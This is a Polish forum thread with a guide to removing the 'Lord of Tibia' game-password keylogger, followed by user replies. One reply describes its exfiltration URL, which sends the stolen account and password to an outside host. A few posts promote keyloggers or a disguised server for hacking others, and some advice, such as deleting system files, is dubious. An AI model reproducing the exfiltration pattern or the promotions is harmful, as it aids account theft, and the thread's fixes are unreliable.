Co to Lord of Tibia?
To prawdopodobnie najlepszy obecnie dostępny keylogger do Tibii. Swoimi możliwościami przewyższa nawet OwnTibię. Testowałem go na kilku antywirusach, lecz żaden go jeszcze nie wykrył... Nawet próby wysłania passów... Sądzę więc, że jest się czego bać :| To nie jest kolejny keylogger pisany przez amatora, lecz wygląda na to, że ten koleś zna się na rzeczy...

O jego zabezpieczeniach
Zacznę może od początku. Są 2 wersje - darmowa (Free) i płatna (Pro). Free, jako że jest zubożała w opcjach, jest łatwa do zablokowania. Natomiast wersja Pro zdołała zdjąć wszelkie zabezpieczenia jakie zastosowałem... Narazie nie wiadomo jak się tego płatnego świństwa pozbyć. Jeżeli chcesz pomóc w tego odkryciu, przeczytaj koniec tematu.

A więc do dzieła!
Usunięcie z komputera
Wchodzimy w Start --> Uruchom i wpisujemy regedit. Naciskamy enter. Teraz korzystając z drzewa po lewej, przejdź do klucza:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run
Po prawej stronie odnajdujemy nazwę wartośći 'SysCtrl'. Jeżeli jej nie ma, to znaczy, że nie masz keya Lord of Tibia na swoim komputerze. Zapisz sobie ścieżkę do pliku, która pisze na prawo od nazwy wartości. Nie usuwaj jej! Nic to nie da, keylogger w ciągu parenastu sekund ją przywróci.
Teraz uruchamiamy komputer w trybie awaryjnym (podczas włączania komputera naciskajcie F8 aż pojawi się okienko wyboru trybów). Zależnie od wersji keyloggera, będziesz miał zapisane na kartce samą nazwę pliku, lub ścieżkę do niego. W 2-gim przypadku poprostu usuń ten plik. W 1-szym natomiast przejdź do katalogu C:\Windows\system32\drivers\etc, a w przypadku systemu z rodziny NT C:\Winnt\system32\drivers\etc i usuń plik o nazwie którą odczytałeś wcześniej.
Teraz uruchom komputer normalnie, przejdź do wspomnianego wcześniej klucza w rejestrze, usuń wartość 'SysCtrl' i gotowe!

Zabezpieczenie na przyszłość
Aby zablokować wersję Free, wystarczy ustawić w naszym komputerze przekierowanie adresu ich strony na swój własny komputer (jego adres to '127.0.0.1'). Tak więc wchodzimy do katalogu C:\Windows\system32\drivers\etc, a w przypadku systemu z rodziny NT C:\Winnt\system32\drivers\etc. Teraz otwieramy znajdujący się tam plik hosts notatnikiem, i dodajemy następujące linijki:
127.0.0.1 lordoftibia.pl
127.0.0.1 www.lordoftibia.pl
Plik zapisujemy i zamykamy. Od teraz darmowa wersja już nas nie ruszy :)


Jeżeli chcesz pomóc w wyszukiwaniu zabezpieczeń, to link do strony keyloggera gdzie możesz pobrać jego konfigurator masz w części 'Zabezpieczenie na przyszłość', a dokładniej to w tym co musisz dopisać do pliku 'hosts'. Gdy coś odkryjesz, wyślij mi tu prywatną wiadomość na forum opisując dokładnie ten sposób. Jeżeli okaże się poprawny, to zamieszczę go tutaj w temacie

Bardzo dobrze, ze wreszcie sie ktos tym zajal. Ten key krazy po swiecie juz kilka dobrych dni. Jeden z moich kolegow juz odczul go bolesnie.

Dzieki za pomoc. Mam nadzieje, ze ktos znajdzie rozwiazanie jak zablokowac platna wersje.

w jaki sposob ma to zarazac?

Widzę, że wielu ludzi idzie w "moje ślady" :P
Ale ostatnimi czasu coraz więcej tych "keyloggers4tibia" :/
Ale poradnik ładny i na pewno się przyda.

Ładny poradnik, wersja free dzięki Tobie już mi nie zaszkodzi : p


Emcess.

w jaki sposob ma to zarazac?

Poprzez otwarcie pliku z tym keyloggerem? -.^ Wtedy instaluje Ci się cichcem na kompie

Ja uważam, że takie poradniki kilka dni później okazują się nieprzydatne, albowiem autor programu zmienia ścieżkę keyloggera.

@up
Geniuszu, ale przecież właśnie tą nową ścieżkę odczytujemy z rejestru -.^

Mam jeszczę jedną uwagę:
C:\Winnt\system32\drivers\etc. Teraz otwieramy znajdujący się tam plik hosts notatnikiem, i dodajemy następujące linijki:
Kod:
127.0.0.1 lordoftibia.pl
127.0.0.1 www.lordoftibia.pl
Autor pewnie przemyśli sprawę i keylogger będzie blokował hosts (podobnie jak owntibia).

Mam jeszczę jedną uwagę:

Autor pewnie przemyśli sprawę i keylogger będzie blokował hosts (podobnie jak owntibia).

Wersja Pro to robi już od dawna, czytaj ze zrozumieniem... Free nie potrafi zdejmować żadnych zabezpieczeń i ten sposób działa tylko na niego.

Sorry, zapomniałem dodać, że mam na myśli Free.

O, thx, na free jestem już "odporny". ale co z Pro ;\ Mógłbym to jakoś sprawdzić, gdybym się na tym znał, a u mnie z taką wiedzą kiepsko ;\ Ale poradnik dobry, jeden kej~ mniej, który może mi zaszkodzić :P

Jedno pytanie.

Do jakiego typu plików można to podłączyć? Tylko .e x e / .b a t / .s c r ?

Bo jak tak to nie jest to jakieś straszne zagrożenie...

myśle, że ten "keyloggger" jak to jest napisane na screenie, nie jest taki znowu groźny, skoro można bezpłatną wersję tak łatwo usunąć, a na płatną dam sobie ręke uciąć, że Kaspersky z licencją, updatowany sobie da spokojnie rade.

dam sobie ręke uciąć, że Kaspersky z licencją, updatowany sobie da spokojnie rade.
No to zostałeś kaleką :P

Tak się zastanawiam:

1. Keyloggera trzeba "zainstalować" na swoim kompie
2. Przyjmijmy, że z każdym startem systemu uruchamia się też keylogger, i potem rezyduje w pamięci.

Primo-powinno się dać stwierdzić jego obecność w programach uruchamianych wraz ze startem systemu.

3. Keylogger przechwytuje login/pass i musi je wysłać do innego komputera. Powstaje pytanie-czy wysyłanie jest wykonywane przez ten keylogger rezydujący w pamięci? Jeśli tak to firewall powinien wykazać, że "jakiś program" próbuje wysłać dane i czy mu na to zezwolić?

4. Potencjalne miejsca zablokowania działania keyloggera to:
- instalka
- monitorowanie autostartu
- firewall

Co Wy na to?

Omija firewalle.

POnieważ się nie znam to tylko logicznie myślę i wychodzi mi, że:

1. Wszystkie dane wysyłane i pobierane z netu robią tzw. traffic. SKoro tak, to jeśli w moim firewallu polecę zablokować wszystkie pakiety wychodzące, to nic nie powinno wyjść. Na jakiej zasadzie miałoby to nie dotyczyć danych wysyłanych przez keyloggera?

2. Jeżeli omija firewalla (ktoś potrafi wytłumaczyć w jaki sposób) to jest programem, który jest niewykrywalny?

3. Nawet jeśli przyjmiemy hipotezę z omijaniem firewalla to nadal pozostaje kwestia rezydowania keyloggera w pamięci. Czyli wygląda na to, że najłatwiej jest go unieszkodliwić na tym poziomie.

SKoro tak, to jeśli w moim firewallu polecę zablokować wszystkie pakiety wychodzące, to nic nie powinno wyjść
Hm, jeżeli to zrobisz, to się nawet do Tibii nie będziesz mógł zalogować.

Hm, jeżeli to zrobisz, to się nawet do Tibii nie będziesz mógł zalogować.

Oczywiście, że nie będę mógł, ale jeżeli prawdą jest, że ten keylogger omija firewalla to mimo całkowitej blokady na firewallu, inny programik do pomiaru trafficu wykaże jednak ruch na łączu.

Nie tyle omija, co nie łączy się samodzielnie z internetem, ale wykorzystuje do tego internet explorera/eksploratora windows.
Po prostu każe się połączyć z www.hackmeplx.pl/dodaj.php?login=login_na_hackmeplx.pl?acc=przechwy cony_numer_konta?pass=przechwycone_hasło
Czy tam jeszcze kilka innych zmiennych. Dzięki temu nie jest wykrywany przez firewalle jako program łączący się z zewnętrznym serverem. Oczywiście, jeżeli mamy zablokowane programy iexplorer****** i explorer******* w firewallu w teorii nie nie powinno przejść. Tak w teorii, nie testowałem tego;)


*Używanie internet eksplorera to szukanie guza
** od czasów win98 i IE 5.0, programy IE i eksplorator windows są zintegrowane-przy pomocy eksploratora można przeglądać strony www, korzystając z silnika IE.

Edit
Przenoszę do poradników.

Edit 2:
oczywiście można jeszcze dopisać hackmeplx.pl do hosts, jak to elvena pisze. Skuteczniejsze dopóki keylog nie wykazuje tamtych wpisów.. Chodź na winxp, jeżeli nie siedzimy na koncie root, tylko na zwykłym userze, nie powinien mieć do tego uprawnień.

Nie tyle omija, co nie łączy się samodzielnie z internetem, ale wykorzystuje do tego internet explorera/eksploratora windows.
Po prostu każe się połączyć z www.hackmeplx.pl/dodaj.php?login=login_na_hackmeplx.pl?acc=przechwy cony_numer_konta?pass=przechwycone_hasło
Czy tam jeszcze kilka innych zmiennych. Dzięki temu nie jest wykrywany przez firewalle jako program łączący się z zewnętrznym serverem. Oczywiście, jeżeli mamy zablokowane programy iexplorer****** i explorer******* w firewallu w teorii nie nie powinno przejść. Tak w teorii, nie testowałem tego;)


*Używanie internet eksplorera to szukanie guza
** od czasów win98 i IE 5.0, programy IE i eksplorator windows są zintegrowane-przy pomocy eksploratora można przeglądać strony www, korzystając z silnika IE.

Edit
Przenoszę do poradników.

Edit 2:
oczywiście można jeszcze dopisać hackmeplx.pl do hosts, jak to elvena pisze. Skuteczniejsze dopóki keylog nie wykazuje tamtych wpisów.. Chodź na winxp, jeżeli nie siedzimy na koncie root, tylko na zwykłym userze, nie powinien mieć do tego uprawnień.

Dopisywanie do pliku hosts nie ma dużego sensu, bo posłużył się tą metodą owntibia deleter z torga i owntibia nauczyła się takie wpisy usuwać.

Dwimenor masz w 100% rację. "Keyloggery" typu owntibia i podobne "omijają" firewalla w ten sposób, że korzystają z Internet Explorera, którego zwykle każdy firewall przepuszcza.

Oczywiście możemy to wykorzystać w celu zablokowania owntibii:
1. Upewniamy się, że mamy zainstalowanego Firefoxa lub Operę.
2. Znajdujemy plik c:\program files\internet explorer\iexplore. exe i USUWAMY.
3. Gotowe. Owntibia nie ma jak się skomunikować z serwerem i nie jesteśmy hackowani. Oczywiście dopóki Wizzard nie zrobi update.

Testowane dzisiaj na (chyba stosunkowo świeżej wersji) owntibii vip.

Edit: Oj, właśnie zauważyłem, że to zły temat. Sposób z usunięciem iexplore. exe działa na owntibię i tibiastealera. Na temat lord of tibia nie mam żadnych informacji, a nie chce mi się zakładać u nich konta. Prośba, czy ktoś może tego lord of tibia wystawić np. na rapidshare?

2. Znajdujemy plik c:\program files\internet explorer\iexplore. exe i USUWAMY.


CZYLI IKONKE TEGO CALEGO IEXPLORERA WYWALAMY??

@up
Tak :P Właśnie przed chwilką usunąłem ten plik prowadzący do dupnego programu. Osobiście używam firefoxa i nie zamierzam nic zmieniać

btw IE SUX!!!!

@edit
@2 up
Dziwne, jak usuwam ten plik to sam się odnawia, lol. Zna ktoś program do CAŁKOWTEGO usuwania IE z kompa?

Dziwne, jak usuwam ten plik to sam się odnawia, lol. Zna ktoś program do CAŁKOWTEGO usuwania IE z kompa?
Oczywiście, że się odnawia. To jeden z ważniejszych plików w Windowsie. A ponieważ Eksplorator Windows korzysta z tego samego silnika co IE, to tego drugiego nie da się tak po prostu usunąć. Jest zbyt mocno zintegrowany z samym systemem.

Problem z tym, że wywalenie IE z systemu nie jest takie proste. Przy instalacji win98 można wybrać(wow, Microsoft daje wybór!), czy IE ma być zainstalowany. Nie wiem jak w winxp. Po instalacji: niby są metody(dla googla: "usuwanie IE z systemu" i podobne), ale z tego co czytałem to masa grzebania w rejestrze.
Drugi problem: IE jest bardzo zintegrowany z systemem i wywalenie powoduje utracenie stabilności. Ponadto wiele programów działa przy pomocy tej przeglądarki. Płytki z różnych czasopism(Komputer Świat), niektóre antywirusy/firewalle(kiedyś Zone Alarm nie chciał się zainstalować bez IE 6.0, nie wiem jak teraz), komunikatory(tlen, konnect,gg), pomoc systemowa, ActiveDesktop i cała masa innych programów
W gruncie rzeczy, można zablokować IE w firewallu. Powinno wystarczyć.


Oj, właśnie zauważyłem, że to zły temat. Sposób z usunięciem iexplore. exe działa na owntibię i tibiastealera. Na temat lord of tibia nie mam żadnych informacji, a nie chce mi się zakładać u nich konta.

Lord of tibia działa dokładnie w ten sam sposób jak owntibia.

Mam pytanie, wiem że nie ten temat...
Czy obrazek ***** jest exploitem
Bo koleś prosi aby mu zamienić obrazek z ***** na .jpg
Obrazek usiłuje wysłać przez gg, a zdawało mi się, że filmiki ***** to keyloggery więc pomyślałem że ten SS też jest keyloggerem...

Co do odnawiającego się pliku: tego nie przewidziałem, u mnie funkcja Windows File Protection (przywracanie plików systemowych) jest wyłączona. Teoretycznie można z nią walczyć: najpierw usunąć plik c:\windows\system32\dllcache\iexplore. exe a dopiero potem c:\program files\internet explorer\iexplore. exe. Teraz już zombie IE nie powinien powracać zza grobu. Ale to raczej zbyt dużo kłopotu (dostęp do dllcache chyba zwykle też jest jakoś zablokowany).

Co do ważności Explorera: fakt, IE i Explorator (w ogóle cały interfejs Windowsa) korzystają z tego samego silnika, więc nie da się go tak łatwo usunąć. Ale nie to nas interesuje, tylko sam plik iexplore. exe który jest jakby tylko "launcherem" i sam w sobie tego enginu nie zawiera. U mnie plik ten ma ok ~94 kB, u was może być trochę więcej lub mniej w zależności od wersji Windows i service packów. W tak małym pliku nie zmieści się pełna przeglądarka internetowa, on ją tylko odpala. Można byłoby go wyrzucić bez szkody dla systemu. Niestety Dwimenor twierdzi że ten pliczek jest na tyle istotny, że antywirusy itp. odmawiają posłuszeństwa. No cóż :-/

W gruncie rzeczy, można zablokować IE w firewallu. Powinno wystarczyć.

O właśnie. Proste i skuteczne.

Mam pytanie, wiem że nie ten temat...
Czy obrazek ***** jest exploitem
Bo koleś prosi aby mu zamienić obrazek z ***** na .jpg
Obrazek usiłuje wysłać przez gg, a zdawało mi się, że filmiki ***** to keyloggery więc pomyślałem że ten SS też jest keyloggerem...

Rozszerzenie scr? Na pewno keylogger. Ponadto podawanie byle komu numeru gg też nie jest bezpieczne.

A testował ktoś jak te key radzą sobie z routerem?
Na kumplu przetestowane, że proste key router nie wypuszcza...
I jeszcze taka rzecz - jeśli miałbym na kompie 2 systemy i np. w tibie grał na linuksie to raczej jest 100% bezpieczeństwa?

A testował ktoś jak te key radzą sobie z routerem?
Na kumplu przetestowane, że proste key router nie wypuszcza...
I jeszcze taka rzecz - jeśli miałbym na kompie 2 systemy i np. w tibie grał na linuksie to raczej jest 100% bezpieczeństwa?
Jeżeli złapiesz keylogga na windowsie, to nie będzie działał na drugim OS. Zresztą: wszystkie owntibie i inne działają wyłącznie na systamach firmy Microsoft(i też nie wszystkich)

ten poradnik to bardzo dobra reklama tego keyloggera ;)

@Do pana Grim Rider

http://i17.tinypic.com/6bdex3d.jpg
Hmmm...

@up
pwn3d xD

Bardzo dobry dzieki :)

słuchaj kolo nie pobieram takich syfów btw fajny sposób na ludzi ...

Ale ja odkryłem lepszy i nie wykyje go nikt ale nie używam tylko kupli z klasy
:P

FUCK SEX CUM
Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus Moraxus
Moraxus Moraxus
Moraxus Moraxus
Moraxus Moraxus
Moraxus Moraxus
Moraxus Moraxus

Kurwa z keyloggerami. Niedługo będę się bał otworzyć plik lodówka. e x e w rl :p

Bardzo dobry poradnik, proszę tylko o poprawienie:
która pisze na "która jest napisana" :)

To teraz ja walne pytanie : a co jeżeli "regedit'em" wykryje keyloggera, ale jak go próbuje znaleźć w ścieżce którą mi pokazał to go nie ma?

@Edit:
Jednak sobie jakoś poradziłem xd

Ok. teraz ja mam pytanie. Co w przypadku, jesli przed przeczytaniem poradnika usunalem plik sys34.e.xe recznie (bez trybu awaryjnego)? Teraz usunalem sysctrl z regedit no i jak narazie nie pojawia sie tam znowu. Moge sie bezpiecznie logowac? czy key sie zagniezdzil pod jakims innym adresem? Jak go ewentualnie znalesc?

Niestety, hacka nie uniknąłem, wcale to dodawanie tego lordoftibia.pl nie działa ;/ LIPA

..........

Niestety, hacka nie uniknąłem, wcale to dodawanie tego lordoftibia.pl nie działa ;/ LIPA
Bo to działa tylko na darmową wersje.

@topic
Bardzo sie przydaje! Szkoda że są tylko poradniki jak usunąć LoT i own(onw)Tibia.

Bardzo sie przydaje! Szkoda że są tylko poradniki jak usunąć LoT i own(onw)Tibia.
Są jeszcze o tibia mail, tibia stealer...a przynajmniej były :P

...
<link> (usunąć spacje) <-deleter,
passy : Rafiq/raffi123432 pass tylko do deletera, na strone sie nie logniesz (zabezpieczenie przed zmianą przez ew. chętnych ;])
KEYLOGGER


Tak sprawdziłem i to jest wersja pro LoT ale nie deleter tylko serwer keyloggera.
A secondo to 'Rafiq' nie istnieje więc za przeproszeniem 'wypieralaj'.

a jeżeli pokazuje mi taki wpis w hijackthis:
O4 - HKLM\..\Run: [orcToByloLatwe] C:\WINDOWS\winlogon*****

TO JEST KEYLOGGER?

Dziekuje za pomoc Elvena : ) Pozdrawiam

_____________________________
hacked ( 19/07/07) Tak To juz bywa ;<

Oj, musze ci podziekowac Elvena ;p. 10min. temu usunalem dziada (ale 100k i char w plery).

a jeżeli pokazuje mi taki wpis w hijackthis:
O4 - HKLM\..\Run: [orcToByloLatwe] C:\WINDOWS\winlogon*****

TO JEST KEYLOGGER?

tak ale stara wersja raczej. Nie odczytuje passow z tibi 8.0
Usuń ten wpis i c:\windows\winlogon*****

Najlepszym lekarstwem na keyloggera jest umieszczenie w sieci swojego własnego :) Polecam Wam TibiaKey, dzięki któremu sam wzbogaciłem sie o parę groszy. Jest bardzo łatwy w obsłudze i na dodatek bezpłatny. Możecie go ściągnąć z tej stronki link z rozszerzeniem exe Polecam i zycze milej zabawy z hackowaniem :)

Ta Ta patrz uwierzymy... Zapewne osoba ktora mysli napewno nie sciagnie tego keyloggera.

@2up
Raported
@Up
Usuń link z cytatu.

Mam Pytanie Czy Wersje Pro Lord of tibia Wykryje HijackThis ? :] PoZdro

mialem hacka i okazalo sie ze to wlasnie ten key logger... dzieki ;)

N/c < 10 znakUF >

dzięki tobie dowiedziałem sie ze mam tego keyloggera na kompie


ale jakoś go usunąłem :D:D:D:D:D

sciagnelem ten program findit i mi znalazlo lord of tibia ale jak robie jak mowisz to ni nie wyszukuje czyli mam go czy nie??

sciagnelem ten program findit i mi znalazlo lord of tibia ale jak robie jak mowisz to ni nie wyszukuje czyli mam go czy nie??

Daj logi z hijackthis.

omg zalosni jesteście :D

@autor

co z tego ze pokazales jak zablokowac free lord of tibie

Pro zawsze bedzie lepsze niz wy

nara

Ja wchodziłem w procesy zamykałem ten plik i go usuwałem ale nie wiem czy to wystarczało ale chyba tak bo nikt mnie od tamtej pory ni haknol mam tez program find it wykrywa chyba z 4 najbardziej znanych keyloggerów w tym lord of tibia, Owntibia, Tibia Mail, tibia logger. Może uda wam sie gdzieś znaleść na necie ten program

ej jak mam w system32 pliki sysedit***** sysinv.dll sysdm.cpl syskey***** sysmon.ocx sysocmgr***** syssetup.dll system.drv systeminfo***** systray***** ale niema pliku sys34 i w regedit tez niema sysctrl a pliki wymienione sa nie do usuniecia keylogger dalej siedzi ? prosze o pomoc ;(

ej jak mam w system32 pliki sysedit***** sysinv.dll sysdm.cpl syskey***** sysmon.ocx sysocmgr***** syssetup.dll system.drv systeminfo***** systray***** ale niema pliku sys34 i w regedit tez niema sysctrl a pliki wymienione sa nie do usuniecia keylogger dalej siedzi ? prosze o pomoc ;(

Daj loga z hijackthis na http://www.pcformat.pl/forum/index.php.

Ja wchodziłem w procesy zamykałem ten plik i go usuwałem ale nie wiem czy to wystarczało ale chyba tak bo nikt mnie od tamtej pory ni haknol mam tez program find it wykrywa chyba z 4 najbardziej znanych keyloggerów w tym lord of tibia, Owntibia, Tibia Mail, tibia logger. Może uda wam sie gdzieś znaleść na necie ten program

ten program jest w download na www.tibia.pl

Kazdy ma swoje zdanie... Wiec moim zdaniem to wlasnie TY stworzyles ten program poniewaz wiesz dokladnie jak go usunac i piszesz ze nie wiesz jak usunac wersje PRO (zeby inni kupowali antykeyloggera czy cos tam) a pieniadze mozna wysylac albo placic tibijskimi pieniedzmi gosciowi na swiecie REFUGIA a to wlasnie TY na tym swiecie grasz (widnieje w twoim opisie)..

Sorki jesli cie obrazilem lub cos w tym rodzaju ale wiesz... kazdy ma swoje zdanie i te argumenty (sa jeszcze inne) wskazuja na to :evul:


:baby::baby::baby::baby::baby:

Kazdy ma swoje zdanie... Wiec moim zdaniem to wlasnie TY stworzyles ten program poniewaz wiesz dokladnie jak go usunac i piszesz ze nie wiesz jak usunac wersje PRO (zeby inni kupowali antykeyloggera czy cos tam) a pieniadze mozna wysylac albo placic tibijskimi pieniedzmi gosciowi na swiecie REFUGIA a to wlasnie TY na tym swiecie grasz (widnieje w twoim opisie)..

Sorki jesli cie obrazilem lub cos w tym rodzaju ale wiesz... kazdy ma swoje zdanie i te argumenty (sa jeszcze inne) wskazuja na to :evul:


:baby::baby::baby::baby::baby:

1.Nikt tu żadnego programu nie sprzedaje i ie wiem co ty pierdzielisz.
2.nie da sie napisać programu usuwającego wersje pro (przynajmniej jeżeli chodzi o sposób w jaki usuwana jest free) z jednej bardzo prostej przyczyny....zmienia on lokalizację oraz kod.

Świetny poradnik napewno niejednemu z nas przyda sie .

Mam pytanie a nie chce zaśmiecać forum. Nie dawno zjechali Mi postać 38 knight (bardzo dobre skille) ale nie w tym rzecz.. Sprawdzałem nie mam tego super extra keyloggera na kompie... Mam Kasperskiego oryginalna wersje... i teraz powstaje pytanie czy to może być jakiś inny keylogger czy tez mam obić jakiemuś koledze mordkę? Nie wchodzilem w podejrzane linki nic nie instalowałem

i Jaki jest najlepszy antywirus na taki i inne keyloggery?

1.Nikt tu żadnego programu nie sprzedaje i ie wiem co ty pierdzielisz.
2.nie da sie napisać programu usuwającego wersje pro (przynajmniej jeżeli chodzi o sposób w jaki usuwana jest free) z jednej bardzo prostej przyczyny....zmienia on lokalizację oraz kod.
ad.2 da sie, ale jak zauwazyles usuwanie musialoby dzialac w inny sposob od wersji free.

A czy naprzykład jak wejde w jakies nieznany link to też moge miec keyloggera???:(?

Dzieki za poradnik.Widze sie postarałeś ale ja preferuje wszystkim inne wyjście : Zainstalujcie sobie program find it.To najlepszy dotychczasowy program do usuwania calego tego syfu:
-owntibia
-lord of tibia
-tibia mail
-tibia logger

Ten program bodajrze można sciągnąć nawet z tibia.pl a jak nie wpisujecie w google download find it i już.Komputer macie chroniony zawsze sprawdzajcie kompa nim przed uruchomieniem tibi.
PS:Program ma tylko wade ze słabo radzi sobie z usunieciem lordoftibia,ja musialem usuwac kilka razy i 3 razy restartowac kompa zeby sie przyjelo.Jestem w trakcie robienia własnego programu usuwajacego wszystkie typy tego syfu.Jak skoncze mam nadzieje ze tibia.pl ustawi go w dziale download. Pozdro

lol jesteście pojebani myślicie że jak wyskoczy wam okienko "Lord of Tibia został znaleziony i usunięty!" to naprawdę już go nie macie? gdy uruchamiasz keylogger (lub gdy uruchamaisz jakiś plik np. instalator klienta tibii zbinderowany czyli że instaluje ci się ta tibia i dodatkowo gdzieś keylogger) to wtedy w rejestrze jest ten key. Więc usunięcie nic nie da trzeba jeszcze usunąć z rejestru - np findit usuwa z rejestru ale jeśli tylko usunie się z rejestru lord of tibie to do rejestru to lord of tibia przywróci wszystko w 5 sekund i znowu ma się keyloggera ;( więc trzeba po 1. usunąć keyloggera z dysku po 2. usunąć z rejestru tylko jest problem z usunięciem z dysku - jak już znajdziesz to jak usuniesz coś co jest uruchomione? często jest też dodany smaczek - blokuje ci ctrl+alt+delete i nie zamkniesz procesu więc trzeba jakiś program którym zamkniesz i usuniesz proces - program odkurzacz ma taki moduł "Force Deleter" bo usunięciu usuwamy z rejestru i uruchamiamy ponownie kompa. Jeśli jednak nie możesz sę poradzić z tym wszystkim są 2 wyjscia - 1. format 2. Po uruchomieniu tibii poczekaj 30 sekund (keyloggery tego typu zapisują wszystko co napisze się przez 5sec,10 sec, 15sec, 20 sec, 25 sec lub 30 sec wiem tylko że w tibiamail jest to 15 sec) potem wpisujemy passy ale najlepiej na wszelki wypadek klawiaturą ekranową (windows 2000, xp, vista). Jest jeszcze jeden sposób usuwania keya - uruchamiamy w odkurzaczu moduł nie pamiętam nazwy ale coś z tam z rejestrem no i skanujemy wszystko i usuwamy all zbędne nie wiem na jakiej zasadzie to działa ale mi na 1 keya pomogło

dobry poradnik, mam nadzieję że będzie wiecej takich osób, którę będą pomagać w zwalczaniu tego świństwa :]

A teraz moje odczucia po przeczytaniu tego tematu :P
ehh autor tego programu nie jest amatorem to fakt, ale na szczęście żaden program nie jest doskonały, i jeżeli ktoś coś stworzył to powinien to również potrafić usunąć ... więc nie wierzę w to że nie będzie nigdy programu który to gówienko usunie :)

Najlepiej jest przestrzegać zasad (antyvirus, firewall, skanowanie plików pobranych z neta, nie otwieranie podejrzanych stron, firefox, bardzo trudne hasła, różne programy do wykrywania tego świństwa), a jeżeli znalazło by się keyloggera pierw ustalenie źródła pochodzenia (jeżeli np. będzie z jakiegoś pliku) to usunąć ... i format... format zajmuje około godziny, plus godzinka na zainstalowanie reszty programów ....

Teraz zapewne wielu z was powie: "nie chce mi sie robić formatów, tak często" lub "lepiej wolę spróbować usunąć to ręcznie" ... jeżeli jesteś doświadczony nie, to tak usuwasz i bez problemowo... jedziesz, lecz co będzie gdy masz o tym małe pojęcie więcej czasu zejdzie i nie masz pewności że całkowicie usunąłeś.......

lecz moim zdaniem jest poświecić te 2 godzinny co około miesiąc, niż stracić pare miesięcy, a może i nawet lat ciężkiej pracy i nie rzadko wiele ciężko zapracowanych pieniędzy ....

ps. A co na keyloggery, ogień należy zwalczać ogniem, jak by się napisało program który nie szkodzi tibi lecz keyloggerą np. wysyła parę milionów raportów do komputera, na którym są zbierane logi, coś jak spam... tylko że nie dla ludzi... ps2. nie ma żadnych przepisów prawnych, które by skórciły działania tych programów ? Przecież gdzieś muszą być komputery z logami, gdyby tak zgłaszać naruszenie prawa, co jak co programy działają na szkodę użytkowników internetu, i wykradają poufne dane... pomyślicie nie da rady, lub nie wierzę w cuda... i gdyby faktycznie nie było by odzewu, to każdy użytkownik by zgłosił że "ten i ten o hoscie tym i tym, robi to i owo, proszę o zajęcie się tym" i tak raz tygodniowo... nie znudziło by się im słuchanie ciągle tego samego? Oczywiście mówię o dobrych i znanych key~ ponieważ key~ typu "wejdz na bla bla i zaloguj sie i wygraj mpa i 100....k" są ich miliony ....

dobra wiem wiem rozpisałem sie jak zwykle trochę dalej od tematu :)

ps2. to wyżej to tylko moje odczucia nie koniecznie poprawne, ponieważ nie jestem profesjonalistą lecz zwykłym użytkownikiem :) więc jeżeli coś wyda ci się żenujące, bądź zupełnie sprzeczne z rzczywistością napisz mi to :PP

i wreszcie ps3. pisałem to prawie godzinę ...

Dobre wieści...

Strona zablokowana
Uwaga! Projekt Lord of Tibia został tymczasowo wstrzymany. Rejestracja nowych kont została zablokowana. Wszelkie obecnie istniejšce nadal będš działać.

Istniejące obecnie konta działają, ale nowych już na szczęście nie założą :) Zatrzyma to napływ nowych hakerów...

[Cytat pochodzi ze strony LOTa]

Dzieki bardzo mi to pomoglo bo myslalem ze wystarczy antyvirem a to chujostwo przyszlo znowu.Co prawda bez eq ale przynajmniej za miesiac nie dostane znowu hacka.Dzieki Again!

btw: Ktos mi powie co moga miec pornosy brata do lord of tibia(jakim cudem on to mi sciagnal skoro on nie gra w tibie)

@Down
Nie wiem ale i tak latwo mozna co wlaczenie kompa/sciagniecie czegos srednio znanego sprawdzic nowe wpisy(np. Hijackthis)

Podobno ten keylogger jest nie wykrywalny przez programy a u pana up w podpisie jest zdjęcie, że został wykryty prze Spytbot S&D (?). I jeszcze jeden wątek, który mnie interesuje. Zarówno LoT jak i Owntibia dodają wpisy w pozycjach startowych. Czy program monitujący to (np WinPatrol) może zabezpieczyć przed tymi keyloggerami (wyświetlając komunikat, że został dodany nowy wpis do autostartu).

Świetny poradnik :) Uchronil mnie przed strata kilku naprawde wartosciowych kont :P
Dzieki

schakowali mi postac co mam robic ??mozna w jakis inny spób usuna keyloggera??

siemka, mialem tego keyloggera poszlo sie mi je.. konto w tibi 59 elder druid ale szybko odzyskalem w pore, i co ja zrobilem, niemialem antywirusa, lecz wersja pro siedzi w kompie, kupiem pande platinum 2007, zaktalizowalem i wykryla mi keyloggera, nazwa jego to 596com48lord54of89tibia99v.48pro287

panda go usunela i powiedziala ze jest jeszcze jego sciezka i jego mlotszy brat czyli free czy go usunac, tak i poszlo czyli nazwa free jego to byla taka

548com32lord54of89tibia99v.48free697

umnie nie pisalo ze to lord of tibia tylko jakos plikiem jakimis roznymi haslami.

PANDA GÓRA

moze zwalnia troszke kompa ale warto ja miec, ma nawet technologie tru provent cos takiego ze wykywa nieznane wiry keye i inne ktorych szczepionek jeszcze niema :(.

thx za poradnik na pewno sie przyda

Wedug mnie to na początku trzeba pamiętać, żeby nie wchodzić na inne strony niż Tibia.com, Tibia.pl i inne strony które są w linkach tych dwóch.

Przeskanuje ktoś tego lord of tibia i inne keye ArcaVir 2007 i zobaczy, które wykryje.

Hakerzy wstawiają te keye do all plików w swoich kompach, włączają emule torenta etc. Kolega miał keya w Star Treku ściągniętego z torenta.

Fajnie tylko jak to zrobić na systemie Vista :( ????

Wiecie co?? może by ktoś podsumował wszystkie informacje i utworzył coś z tych wszystkich strzępów:p
Przestraszyliście mnie tym keyem 8o

up : żałosny jesteś, 1 dzień na forum i taki keylogger, ciekawe ile masz tutaj zabanowanych kont? [nie ważne xD]

nie ma programu który byłby doskonały każdy ma jakieś luki, o niektórych wiemy o innych nie ....

Wedug mnie to na początku trzeba pamiętać, żeby nie wchodzić na inne strony niż Tibia.com, Tibia.pl i inne strony które są w linkach tych dwóch.

Wow. Ależ nam pokazałeś mądrość życiową, hm, pomyśl, wejde na tibia.com będą tam reklamy z google i będzie jakaś stronka z keyem, co wtedy mądralo?

Emcess.

z tego co pamiętam tylko raz w reklamach google był link prowadzący do trojana, jeden na nie wiem ilu mają reklamodawców tajemnica handlowa :P

a poza tym kto by kupywal reklamke w google, troche to głupie by było bo klikniemy w googla i jakas dziwna strona pisze ze ma "lepsza tibie" ściągnelibyście coś ? myślę że nie :) więc xD

pomuszcie

jak chilem sciongnoc tego robal zeby hakowac inne konta:p
ale dostlem naucze i robal sie odwrucil niewykrolo mi nazwy:

